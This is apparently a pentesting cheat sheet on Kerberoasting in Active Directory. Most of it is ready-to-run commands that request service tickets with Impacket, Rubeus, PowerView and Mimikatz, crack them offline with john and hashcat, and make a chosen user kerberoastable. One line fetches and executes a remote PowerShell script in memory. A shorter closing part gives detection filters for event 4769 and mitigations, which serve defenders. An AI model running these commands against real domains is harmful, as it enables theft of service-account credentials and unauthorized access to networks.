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The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.
You can know that a user account is being used as a service because the property "ServicePrincipalName" is not null.
Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.
You need valid credentials inside the domain.
{% code title="From linux" %}
msf> use auxiliary/gather/get_user_spns
GetUserSPNs.py -request -dc-ip <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
{% endcode %}
{% code title="From Windows, from memory to disk" %}
Get-NetUser -SPN | select serviceprincipalname #PowerView, get user service accounts
#Get TGS in memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local
klist #List kerberos tickets in memory
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder
{% endcode %}
{% code title="From Windows" %}
# Powerview
Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
{% endcode %}
{% hint style="warning" %}
When a TGS is requested, Windows event 4769 - A Kerberos service ticket was requested
is generated.
{% endhint %}
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
If you have enough permissions over a user you can make it kerberoastable:
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
it because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>
Kerberoast is very stealthy if exploitable
- Security Event ID 4769 – A Kerberos ticket was requested
- Since 4769 is very frequent, lets filter the results:
- Service name should not be krbtgt
- Service name does not end with $ (to filter out machine accounts used for services)
- Account name should not be machine@domain (to filter out requests from machines)
- Failure code is '0x0' (to filter out failures, 0x0 is success)
- Most importantly, ticket encryption type is 0x17
- Mitigation:
- Service Account Passwords should be hard to guess (greater than 25 characters)
- Use Managed Service Accounts (Automatic change of password periodically and delegated SPN Management)
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
More information about Kerberoasting in ired.team in here and here.
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